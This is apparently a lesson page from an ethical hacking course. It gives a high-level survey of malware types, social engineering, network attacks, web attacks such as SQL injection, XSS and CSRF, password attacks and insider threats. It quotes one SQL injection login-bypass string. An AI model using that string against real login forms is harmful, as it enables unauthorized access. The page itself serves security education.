Types of Cyber Threats and Attacks

Before you can defend a system — or test its defenses — you need to know what you are defending against. Cyber threats come in many shapes. Each one targets a different part of a system or exploits a different kind of human or technical weakness.

This topic maps out the major attack categories an ethical hacker studies and learns to simulate. Understanding these threats helps you think like an attacker, which is exactly what ethical hacking requires.

Malware: Software Built to Cause Harm

Malware is malicious software — programs written specifically to damage, disrupt, or gain unauthorized access to a computer system. It is the most common tool in a cybercriminal's kit.

Viruses

A virus attaches itself to a clean file. When that file runs, the virus executes and spreads to other files on the same machine. Think of it like a biological virus — it needs a host to replicate. Early viruses spread through floppy disks. Today they spread through email attachments, infected downloads, and compromised websites.

Worms

A worm does not need to attach to a file. It copies itself across networks automatically without any action from the user. In 2003, the SQL Slammer worm infected 75,000 machines in ten minutes by exploiting a flaw in Microsoft SQL Server — no user click required.

Ransomware

Ransomware encrypts all the files on a victim's system, making them unreadable. The attacker then demands payment — usually in cryptocurrency — in exchange for the decryption key. Hospitals, schools, and city governments have paid hundreds of thousands of dollars to recover their data.

Trojans

A Trojan disguises itself as something useful — a free game, a software crack, or a browser plugin. Once installed, it runs malicious code in the background. The name comes from the Trojan horse in Greek mythology: it looks like a gift but carries an attack inside.

Spyware and Keyloggers

Spyware runs silently and collects information about the user — browsing habits, login credentials, financial data — and sends it to the attacker. A keylogger is a specific type of spyware that records every keystroke the user types. Attackers use keyloggers to capture passwords typed during a banking session.

Social Engineering: Attacking the Human

Social engineering does not attack software or hardware. It attacks people. Humans make mistakes, feel pressure, and can be deceived. Social engineering exploits these psychological tendencies to trick people into handing over access or sensitive information.

Phishing

Phishing uses fake emails, text messages, or websites that look identical to legitimate ones. A phishing email might appear to come from a bank, asking the recipient to "verify their account" by clicking a link. The link leads to a fake login page that captures whatever the victim types.

Spear Phishing

Spear phishing is targeted phishing. Instead of sending the same fake email to a million people, the attacker researches a specific person or company and crafts a message that feels personally relevant. An attacker might email a company's finance manager pretending to be the CEO and asking for an urgent bank transfer.

Pretexting

Pretexting involves creating a fabricated scenario — a pretext — to extract information. An attacker calls an IT helpdesk pretending to be a new employee who forgot their password. If the helpdesk resets the password without verifying identity properly, the attacker gains access.

Baiting

Baiting leaves infected USB drives in parking lots, lobbies, or break rooms. Curious employees plug them in. The drive automatically installs malware the moment it connects to a computer. Security researchers have tested this method and found that a significant number of people plug in found USB drives without hesitation.

Network-Based Attacks

Network attacks target the infrastructure that connects computers. Ethical hackers test networks to find misconfigurations, weak protocols, and unprotected services.

Man-in-the-Middle (MitM) Attacks

In a MitM attack, the attacker secretly positions themselves between two communicating parties. Imagine you send a letter to your bank but the attacker intercepts it, reads it, changes part of it, then forwards it. Both you and the bank think you are talking to each other, but the attacker sees and controls everything.

A common real-world example: an attacker sets up a fake public Wi-Fi hotspot named "Coffee Shop Free WiFi." When users connect and log in to websites, the attacker captures every packet of data passing through.

Denial of Service (DoS) and Distributed Denial of Service (DDoS)

A DoS attack floods a server with so many requests that it can no longer respond to legitimate users. A DDoS attack does the same thing but uses thousands of compromised machines — called a botnet — to generate traffic from many locations at once. The target cannot block a single IP address because the flood comes from everywhere.

DNS Spoofing

Every website has an IP address. DNS translates a domain name like "example.com" into the correct IP address. In DNS spoofing, the attacker corrupts that translation, pointing "example.com" to the attacker's server instead. The user types the correct address but lands on a fake website.

Packet Sniffing

Data travels across networks in small packets. A packet sniffer captures those packets and reads their contents. On unencrypted connections, sniffing reveals usernames, passwords, and sensitive data in plain text. Ethical hackers use sniffers like Wireshark to analyze traffic during a penetration test.

Web Application Attacks

Web applications — websites, online banking portals, SaaS tools — are among the most attacked targets because they are publicly accessible and often contain valuable data.

SQL Injection

Many websites use databases to store user data. SQL injection inserts malicious database commands into a form field or URL. A login form that is not properly protected might accept:

' OR '1'='1

This tricks the database into logging the attacker in without a real password. In some cases, SQL injection allows an attacker to download the entire database, including every user's credentials.

Cross-Site Scripting (XSS)

XSS injects malicious JavaScript into a web page viewed by other users. If a website displays user-submitted content without sanitizing it, an attacker can post a comment that contains a script. Every visitor who loads that page runs the attacker's script in their browser. The script can steal session cookies, redirect users, or perform actions on their behalf.

Cross-Site Request Forgery (CSRF)

CSRF tricks a logged-in user into unknowingly sending a request to a web application they are already authenticated with. For example: a user is logged into their bank. An attacker sends an email with an invisible image tag whose URL triggers a bank transfer. When the user's browser loads the email, it silently fires the transfer request using the user's active session.

Password Attacks

Passwords remain the most common authentication method and therefore one of the most targeted elements in any system.

Brute Force

A brute force attack tries every possible combination of characters until it finds the correct password. A short, simple password like "cat1" can be cracked in seconds. A 12-character random password takes billions of years with current hardware.

Dictionary Attack

Instead of trying every combination, a dictionary attack uses a pre-built list of common words, phrases, and known leaked passwords. Because many people use predictable passwords like "password123" or "welcome2024," dictionary attacks succeed at high rates against real-world systems.

Credential Stuffing

Millions of username and password combinations leak from data breaches every year. Attackers take these lists and automatically test them against other services, betting that users reuse the same credentials across multiple platforms. Because many people do reuse passwords, credential stuffing works at scale with minimal effort.

Insider Threats

Not every attack comes from outside the organization. Insider threats involve current employees, former employees, or contractors who misuse their authorized access. An insider threat can be:

  • A disgruntled employee who deletes critical files before resigning
  • A contractor who copies sensitive data to a personal device
  • An employee who falls for a phishing email and gives attackers a foothold
  • A privileged administrator who abuses database access for personal gain

Insider threats are particularly dangerous because the attacker already has authorized access. Traditional perimeter defenses do not stop someone who is already inside.

Threat Diagram: Attack Surface Overview

Think of an organization as a medieval castle:

  • Outer wall — the network perimeter (firewall, IDS/IPS)
  • Gate — web applications and public-facing services
  • Drawbridge — remote access tools and VPNs
  • Villagers inside — employees who can be manipulated through social engineering
  • Guards — IT administrators with elevated privileges
  • Underground tunnels — forgotten legacy systems and unpatched software

An attacker can target any of these. An ethical hacker tests all of them.

Key Points

  • Malware includes viruses, worms, ransomware, Trojans, and spyware — each with a different method of infection and purpose.
  • Social engineering attacks the human element — phishing, spear phishing, pretexting, and baiting exploit trust and psychology rather than technology.
  • Network attacks include MitM, DoS/DDoS, DNS spoofing, and packet sniffing.
  • Web application attacks such as SQL injection, XSS, and CSRF target vulnerabilities in code rather than network infrastructure.
  • Password attacks — brute force, dictionary attacks, and credential stuffing — exploit weak or reused credentials.
  • Insider threats are difficult to detect because the attacker already has authorized access.
Previous lessons
Back to courses
Next lessons

Leave a Comment